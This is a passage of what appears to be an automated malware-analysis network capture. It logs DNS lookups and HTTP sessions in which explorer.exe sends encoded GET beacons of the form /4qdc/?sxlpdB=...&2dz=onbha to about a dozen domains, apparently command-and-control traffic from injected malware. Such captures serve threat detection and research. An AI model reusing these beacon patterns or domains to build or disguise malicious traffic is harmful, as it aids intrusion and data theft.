Feb 23, 2021 09:19:36.329251051 CET	53	61946	8.8.8.8	192.168.2.3
Feb 23, 2021 09:19:36.744668007 CET	64910	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:19:36.795408964 CET	53	64910	8.8.8.8	192.168.2.3
Feb 23, 2021 09:19:38.017047882 CET	52123	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:19:38.067193985 CET	53	52123	8.8.8.8	192.168.2.3
Feb 23, 2021 09:19:41.169655085 CET	56130	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:19:41.233515024 CET	53	56130	8.8.8.8	192.168.2.3
Feb 23, 2021 09:19:41.996720076 CET	56338	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:19:42.055108070 CET	53	56338	8.8.8.8	192.168.2.3
Feb 23, 2021 09:19:46.435403109 CET	59420	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:19:46.513928890 CET	53	59420	8.8.8.8	192.168.2.3
Feb 23, 2021 09:19:51.971105099 CET	58784	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:19:52.033718109 CET	53	58784	8.8.8.8	192.168.2.3
Feb 23, 2021 09:19:57.238603115 CET	63978	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:19:57.298604012 CET	53	63978	8.8.8.8	192.168.2.3
Feb 23, 2021 09:20:02.453564882 CET	62938	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:20:02.551256895 CET	53	62938	8.8.8.8	192.168.2.3
Feb 23, 2021 09:20:07.589055061 CET	55708	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:20:07.752645969 CET	53	55708	8.8.8.8	192.168.2.3
Feb 23, 2021 09:20:11.279791117 CET	56803	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:20:11.329194069 CET	53	56803	8.8.8.8	192.168.2.3
Feb 23, 2021 09:20:12.565169096 CET	57145	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:20:12.633227110 CET	53	57145	8.8.8.8	192.168.2.3
Feb 23, 2021 09:20:13.065254927 CET	55359	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:20:13.134967089 CET	53	55359	8.8.8.8	192.168.2.3
Feb 23, 2021 09:20:18.331641912 CET	58306	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:20:18.397118092 CET	53	58306	8.8.8.8	192.168.2.3
Feb 23, 2021 09:20:23.407660961 CET	64124	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:20:23.471493006 CET	53	64124	8.8.8.8	192.168.2.3
Feb 23, 2021 09:20:28.672559023 CET	49361	53	192.168.2.3	8.8.8.8
Feb 23, 2021 09:20:28.746814013 CET	53	49361	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 23, 2021 09:19:17.523621082 CET	192.168.2.3	8.8.8.8	0x4959	Standard query (0)	www.pcareinc.com	A (IP address)	IN (0x0001)
Feb 23, 2021 09:19:23.433437109 CET	192.168.2.3	8.8.8.8	0xed74	Standard query (0)	www.antips.com	A (IP address)	IN (0x0001)
Feb 23, 2021 09:19:29.580148935 CET	192.168.2.3	8.8.8.8	0xe6cd	Standard query (0)	www.edgewooddhr.net	A (IP address)	IN (0x0001)
Feb 23, 2021 09:19:35.511317968 CET	192.168.2.3	8.8.8.8	0x2f8d	Standard query (0)	www.ndk168.com	A (IP address)	IN (0x0001)
Feb 23, 2021 09:19:41.169655085 CET	192.168.2.3	8.8.8.8	0x1787	Standard query (0)	www.inbarrel.com	A (IP address)	IN (0x0001)
Feb 23, 2021 09:19:46.435403109 CET	192.168.2.3	8.8.8.8	0xd783	Standard query (0)	www.39palmavenue.com	A (IP address)	IN (0x0001)
Feb 23, 2021 09:19:51.971105099 CET	192.168.2.3	8.8.8.8	0xa93c	Standard query (0)	www.buildassetswealth.com	A (IP address)	IN (0x0001)
Feb 23, 2021 09:19:57.238603115 CET	192.168.2.3	8.8.8.8	0x7ccb	Standard query (0)	www.beconfidentagain.com	A (IP address)	IN (0x0001)
Feb 23, 2021 09:20:02.453564882 CET	192.168.2.3	8.8.8.8	0x5690	Standard query (0)	www.torontotel.com	A (IP address)	IN (0x0001)
Feb 23, 2021 09:20:07.589055061 CET	192.168.2.3	8.8.8.8	0xc4d3	Standard query (0)	www.rehabcareconnect.com	A (IP address)	IN (0x0001)
Feb 23, 2021 09:20:13.065254927 CET	192.168.2.3	8.8.8.8	0x9ea2	Standard query (0)	www.speedysnacksbox.com	A (IP address)	IN (0x0001)
Feb 23, 2021 09:20:18.331641912 CET	192.168.2.3	8.8.8.8	0xa7f5	Standard query (0)	www.thepixxelgroup.com	A (IP address)	IN (0x0001)
Feb 23, 2021 09:20:23.407660961 CET	192.168.2.3	8.8.8.8	0xf8a1	Standard query (0)	www.havemercyinc.net	A (IP address)	IN (0x0001)
Feb 23, 2021 09:20:28.672559023 CET	192.168.2.3	8.8.8.8	0xf459	Standard query (0)	www.larek.store	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Feb 23, 2021 09:19:17.702505112 CET	8.8.8.8	192.168.2.3	0x4959	No error (0)	www.pcareinc.com		154.213.108.250	A (IP address)	IN (0x0001)
Feb 23, 2021 09:19:23.587986946 CET	8.8.8.8	192.168.2.3	0xed74	No error (0)	www.antips.com	HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
Feb 23, 2021 09:19:23.587986946 CET	8.8.8.8	192.168.2.3	0xed74	No error (0)	HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com		3.223.115.185	A (IP address)	IN (0x0001)
Feb 23, 2021 09:19:29.757343054 CET	8.8.8.8	192.168.2.3	0xe6cd	No error (0)	www.edgewooddhr.net		208.91.197.27	A (IP address)	IN (0x0001)
Feb 23, 2021 09:19:35.724052906 CET	8.8.8.8	192.168.2.3	0x2f8d	No error (0)	www.ndk168.com		23.224.206.45	A (IP address)	IN (0x0001)
Feb 23, 2021 09:19:41.233515024 CET	8.8.8.8	192.168.2.3	0x1787	No error (0)	www.inbarrel.com	inbarrel.com		CNAME (Canonical name)	IN (0x0001)
Feb 23, 2021 09:19:41.233515024 CET	8.8.8.8	192.168.2.3	0x1787	No error (0)	inbarrel.com		34.102.136.180	A (IP address)	IN (0x0001)
Feb 23, 2021 09:19:46.513928890 CET	8.8.8.8	192.168.2.3	0xd783	No error (0)	www.39palmavenue.com	sslplaform.bostonlogic.com		CNAME (Canonical name)	IN (0x0001)
Feb 23, 2021 09:19:46.513928890 CET	8.8.8.8	192.168.2.3	0xd783	No error (0)	sslplaform.bostonlogic.com	sequoia.bostonlogic.com		CNAME (Canonical name)	IN (0x0001)
Feb 23, 2021 09:19:46.513928890 CET	8.8.8.8	192.168.2.3	0xd783	No error (0)	sequoia.bostonlogic.com		23.253.73.122	A (IP address)	IN (0x0001)
Feb 23, 2021 09:19:52.033718109 CET	8.8.8.8	192.168.2.3	0xa93c	No error (0)	www.buildassetswealth.com	buildassetswealth.com		CNAME (Canonical name)	IN (0x0001)
Feb 23, 2021 09:19:52.033718109 CET	8.8.8.8	192.168.2.3	0xa93c	No error (0)	buildassetswealth.com		34.102.136.180	A (IP address)	IN (0x0001)
Feb 23, 2021 09:19:57.298604012 CET	8.8.8.8	192.168.2.3	0x7ccb	No error (0)	www.beconfidentagain.com		104.21.76.239	A (IP address)	IN (0x0001)
Feb 23, 2021 09:19:57.298604012 CET	8.8.8.8	192.168.2.3	0x7ccb	No error (0)	www.beconfidentagain.com		172.67.202.77	A (IP address)	IN (0x0001)
Feb 23, 2021 09:20:02.551256895 CET	8.8.8.8	192.168.2.3	0x5690	Name error (3)	www.torontotel.com	none	none	A (IP address)	IN (0x0001)
Feb 23, 2021 09:20:07.752645969 CET	8.8.8.8	192.168.2.3	0xc4d3	No error (0)	www.rehabcareconnect.com	rehabcareconnect.com		CNAME (Canonical name)	IN (0x0001)
Feb 23, 2021 09:20:07.752645969 CET	8.8.8.8	192.168.2.3	0xc4d3	No error (0)	rehabcareconnect.com		92.249.45.191	A (IP address)	IN (0x0001)
Feb 23, 2021 09:20:13.134967089 CET	8.8.8.8	192.168.2.3	0x9ea2	No error (0)	www.speedysnacksbox.com	speedysnacksbox.com		CNAME (Canonical name)	IN (0x0001)
Feb 23, 2021 09:20:13.134967089 CET	8.8.8.8	192.168.2.3	0x9ea2	No error (0)	speedysnacksbox.com		34.102.136.180	A (IP address)	IN (0x0001)
Feb 23, 2021 09:20:18.397118092 CET	8.8.8.8	192.168.2.3	0xa7f5	Name error (3)	www.thepixxelgroup.com	none	none	A (IP address)	IN (0x0001)
Feb 23, 2021 09:20:23.471493006 CET	8.8.8.8	192.168.2.3	0xf8a1	No error (0)	www.havemercyinc.net	havemercyinc.net		CNAME (Canonical name)	IN (0x0001)
Feb 23, 2021 09:20:23.471493006 CET	8.8.8.8	192.168.2.3	0xf8a1	No error (0)	havemercyinc.net		34.102.136.180	A (IP address)	IN (0x0001)
Feb 23, 2021 09:20:28.746814013 CET	8.8.8.8	192.168.2.3	0xf459	No error (0)	www.larek.store		185.104.45.146	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.pcareinc.com

www.antips.com

www.edgewooddhr.net

www.ndk168.com

www.inbarrel.com

www.39palmavenue.com

www.buildassetswealth.com

www.beconfidentagain.com

www.rehabcareconnect.com

www.speedysnacksbox.com

www.havemercyinc.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49713	154.213.108.250	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 09:19:18.058295012 CET	1018	OUT	GET /4qdc/?sxlpdB=n05rnph+IqNz0mbSS5vp9sGjLY7dyqnysY607r4vHHjCLr3ziiRBE07QjlPjM5GqarqD&2dz=onbha HTTP/1.1 Host: www.pcareinc.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49715	3.223.115.185	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 09:19:23.717447996 CET	1021	OUT	GET /4qdc/?sxlpdB=FDPsk0sff5Lw+z8Vw8rcgpm8MWqJfMs2bvH8+cW5/POI2TSyhlXdRmW8g+C2mzqgUbJY&2dz=onbha HTTP/1.1 Host: www.antips.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 23, 2021 09:19:23.844760895 CET	1026	IN	HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=utf-8 Location: https://www.hugedomains.com/domain_profile.cfm?d=antips&e=com Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Tue, 23 Feb 2021 08:19:02 GMT Connection: close Content-Length: 182 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 75 67 65 64 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 64 6f 6d 61 69 6e 5f 70 72 6f 66 69 6c 65 2e 63 66 6d 3f 64 3d 61 6e 74 69 70 73 26 61 6d 70 3b 65 3d 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.hugedomains.com/domain_profile.cfm?d=antips&e=com">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.3	49753	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 09:20:23.514893055 CET	6424	OUT	GET /4qdc/?sxlpdB=o1YYd6Gi2K67gelLAX14ago2MHBzIaWFdtb1Ca8ijRLt6mEmIsAV47qF7pv8e7ASo7Rk&2dz=onbha HTTP/1.1 Host: www.havemercyinc.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 23, 2021 09:20:23.654359102 CET	6425	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Tue, 23 Feb 2021 08:20:23 GMT Content-Type: text/html Content-Length: 275 ETag: "603153c4-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49722	208.91.197.27	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 09:19:29.946145058 CET	1250	OUT	GET /4qdc/?sxlpdB=+7VgHCQQJYO0FHfoX4VwpMGRpMkf/fkwbCKrV3wMZoe5nkwvpaAzoW+aSblNd7Hd+wjC&2dz=onbha HTTP/1.1 Host: www.edgewooddhr.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 23, 2021 09:19:30.277334929 CET	1282	IN	HTTP/1.1 200 OK Date: Tue, 23 Feb 2021 08:19:30 GMT Server: Apache Set-Cookie: vsid=918vr3616139700809367; expires=Sun, 22-Feb-2026 08:19:30 GMT; Max-Age=157680000; path=/; domain=www.edgewooddhr.net; HttpOnly X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_hYI5FgRivm97L0ZhxJZJHb6tu9340hOnvoCgyVNLxugqNGFCB7mbeB8pbBQwYrXBInZ2FL1RynS3GR30enIkxQ== Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 34 39 30 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45 41 41 51 3d 3d 5f 68 59 49 35 46 67 52 69 76 6d 39 37 4c 30 5a 68 78 4a 5a 4a 48 62 36 74 75 39 33 34 30 68 4f 6e 76 6f 43 67 79 56 4e 4c 78 75 67 71 4e 47 46 43 42 37 6d 62 65 42 38 70 62 42 51 77 59 72 58 42 49 6e 5a 32 46 4c 31 52 79 6e 53 33 47 52 33 30 65 6e 49 6b 78 51 3d 3d 22 3e 0d 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 65 64 67 65 77 6f 6f 64 64 68 72 2e 6e 65 74 2f 70 78 2e 6a 73 3f 63 68 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 65 64 67 65 77 6f 6f 64 64 68 72 2e 6e 65 74 2f 70 78 2e 6a 73 3f 63 68 3d 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 66 75 6e 63 74 69 6f 6e 20 68 61 6e 64 6c 65 41 42 50 44 65 74 65 63 74 28 29 7b 74 72 79 7b 69 66 28 21 61 62 70 29 20 72 65 74 75 72 6e 3b 76 61 72 20 69 6d 67 6c 6f 67 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6d 67 22 29 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 30 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 74 Data Ascii: 4907<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_hYI5FgRivm97L0ZhxJZJHb6tu9340hOnvoCgyVNLxugqNGFCB7mbeB8pbBQwYrXBInZ2FL1RynS3GR30enIkxQ=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.edgewooddhr.net/px.js?ch=1"></script><script type="text/javascript" src="http://www.edgewooddhr.net/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0px";imglog.st
Feb 23, 2021 09:19:30.277365923 CET	1283	IN	Data Raw: 79 6c 65 2e 77 69 64 74 68 3d 22 30 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 65 64 67 65 77 6f 6f 64 64 68 72 2e 6e 65 74 2f 73 6b 2d 6c 6f 67 61 62 70 73 74 61 74 75 73 2e 70 68 70 3f 61 3d 4f 47 56 36 62 Data Ascii: yle.width="0px";imglog.src="http://www.edgewooddhr.net/sk-logabpstatus.php?a=OGV6bW5PNHY5RDBLVDRlaE9pMHUwVmhuSE9saGtQT3piOEZiYkdMMzFLblNHQkt3U0VxU0pISE82Q1VhblNqKzczdkVMRkRzSlZlelNjZExpRzdMTUpEc3NkeTdHell1R20zQXEyVTRkRFU9&b="+abp;document.body
Feb 23, 2021 09:19:30.277400970 CET	1284	IN	Data Raw: 74 73 2f 6f 70 65 6e 2d 73 61 6e 73 2f 6f 70 65 6e 2d 73 61 6e 73 2e 6f 74 66 22 29 20 66 6f 72 6d 61 74 28 22 6f 70 65 6e 74 79 70 65 22 29 2c 75 72 6c 28 22 68 74 74 70 3a 2f 2f 69 34 2e 63 64 6e 2d 69 6d 61 67 65 2e 63 6f 6d 2f 5f 5f 6d 65 64 Data Ascii: ts/open-sans/open-sans.otf") format("opentype"),url("http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.svg#open-sans") format("svg");font-weight: normal;font-style: normal;}@font-face {font-family: "open-sans-bold";src: url("http://
Feb 23, 2021 09:19:30.354926109 CET	1316	IN	Data Raw: 20 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 68 74 74 70 3a 2f 2f 69 34 2e 63 64 6e 2d 69 6d 61 67 65 2e 63 6f 6d 2f 5f 5f 6d 65 64 69 61 5f Data Ascii: background:#fff;font-weight: 400;background: url(http://i4.cdn-image.com/__media__/pics/27587/BG_2.png) no-repeat center bottom; background-size: cover;background-attachment: fixed;}.top-strip .main-container{width:1150px; margin:0 auto;p
Feb 23, 2021 09:19:30.439970970 CET	1318	IN	Data Raw: 20 61 75 74 6f 3b 7d 0d 0a 2e 73 65 61 72 63 68 62 6f 78 7b 66 6c 6f 61 74 3a 72 69 67 68 74 3b 20 77 69 64 74 68 3a 34 30 30 70 78 3b 20 68 65 69 67 68 74 3a 33 37 70 78 3b 7d 0d 0a 2e 73 72 63 68 2d 74 78 74 7b 66 6c 6f 61 74 3a 20 6c 65 66 74 Data Ascii: auto;}.searchbox{float:right; width:400px; height:37px;}.srch-txt{float: left; width: 343px; height: 37px; padding:0 10px;font-size: 16px; background: #fff; color: #000; padding: 0 10px; outline: none; border: none}.srch-btn{float: righ
Feb 23, 2021 09:19:30.517585039 CET	1327	IN	Data Raw: 2e 6b 77 64 5f 62 6c 6f 61 63 6b 20 75 6c 20 6c 69 20 61 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 62 38 30 34 30 3b 63 6f 6c 6f 72 3a 20 23 66 66 66 7d 0d 0a 0d 0a 2e 73 61 6c 65 2d 6d 73 67 20 7b 62 61 63 6b Data Ascii: .kwd_bloack ul li a:hover{background-color:#0b8040;color: #fff}.sale-msg {background:#fff; color:#4b4b4b; text-align:center; font-size:14px; height:40px; width:100%; top:0; left:0}.sale-msg a {text-decoration: none; color:#079ce9; font-s
Feb 23, 2021 09:19:30.517618895 CET	1328	IN	Data Raw: 73 66 6f 72 6d 3a 20 6e 6f 6e 65 3b 7d 0d 0a 20 20 20 20 2e 6d 73 67 72 69 67 68 74 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 7d 0d 0a 20 20 20 20 2e 74 6f 70 2d 73 74 72 69 70 7b 6d 61 72 67 69 Data Ascii: sform: none;} .msgright{width: 100%;text-align: center} .top-strip{margin-bottom: 40px} .logo-img-wrap{float:none;width:auto} .searchbox{margin:0; float:none; width:auto; padding:20px 5px} .kwd_bloack{float:none; wid
Feb 23, 2021 09:19:30.624599934 CET	1331	IN	Data Raw: 70 78 7d 0d 0a 20 20 20 20 2e 6d 73 67 72 69 67 68 74 20 2e 65 78 70 4d 73 67 2c 20 2e 62 61 63 6b 6f 72 64 65 72 2c 20 2e 6d 73 67 72 69 67 68 74 20 2e 65 78 70 4d 73 67 20 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 7d 0d 0a 20 20 20 20 Data Ascii: px} .msgright .expMsg, .backorder, .msgright .expMsg a{font-size: 12px} .related-searches-custom{font-size: 14px} }</style><script language="JavaScript" type="text/javascript" src="http://i4.cdn-image.com/__media__/js/min.js?v
Feb 23, 2021 09:19:30.624634981 CET	1332	IN	Data Raw: 65 64 67 65 77 6f 6f 64 64 68 72 2e 6e 65 74 22 20 6f 6e 43 6c 69 63 6b 3d 22 72 65 74 75 72 6e 20 70 6f 70 75 70 28 74 68 69 73 2c 20 27 6e 6f 74 65 73 27 29 22 3e 20 57 68 79 20 61 6d 20 49 20 73 65 65 69 6e 67 20 74 68 69 73 20 27 55 6e 64 65 Data Ascii: edgewooddhr.net" onClick="return popup(this, 'notes')"> Why am I seeing this 'Under Construction' page?</a></p> <div class="expMsg"> </div> </div> </div> </div>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49735	23.224.206.45	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 09:19:35.940804005 CET	1963	OUT	GET /4qdc/?sxlpdB=fgRLe1wDsIR582SpVqHNrqc5X9FQKzC9eNMuu75MPd7YekjVZ2QEORs18XDbgwZ5UcjJ&2dz=onbha HTTP/1.1 Host: www.ndk168.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49740	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 09:19:41.279925108 CET	2121	OUT	GET /4qdc/?sxlpdB=DRpehdA/33BzcPgqXFJLC0P+7mKy3AC9kGgryjypn4W4a4lypWUQvIUJQnrelubfkLFp&2dz=onbha HTTP/1.1 Host: www.inbarrel.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 23, 2021 09:19:41.421806097 CET	2121	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Tue, 23 Feb 2021 08:19:41 GMT Content-Type: text/html Content-Length: 275 ETag: "6031584e-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49746	23.253.73.122	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 09:19:46.672395945 CET	6395	OUT	GET /4qdc/?sxlpdB=ZB8Pl5eBC7Hephg+P6iGhrGYsApNwIB7ekAHWQJEYqlC8jRN6CLcZFL5CLWpIktyGytq&2dz=onbha HTTP/1.1 Host: www.39palmavenue.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 23, 2021 09:19:46.848619938 CET	6396	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 23 Feb 2021 08:19:46 GMT Server: Apache/2.4.18 (Ubuntu) Cache-Control: no-cache Vary: Accept-Encoding X-Request-Id: 192509b7-553e-4f5e-9363-f522e5c5a0f9 X-Runtime: 0.011706 X-Powered-By: Phusion Passenger Enterprise 6.0.1 Location: https://www.onesothebysrealty.com/39palmavenue Status: 301 Moved Permanently Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 X-Frame-Options: SAMEORIGIN Data Raw: 37 30 0d 0a 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6f 6e 65 73 6f 74 68 65 62 79 73 72 65 61 6c 74 79 2e 63 6f 6d 2f 33 39 70 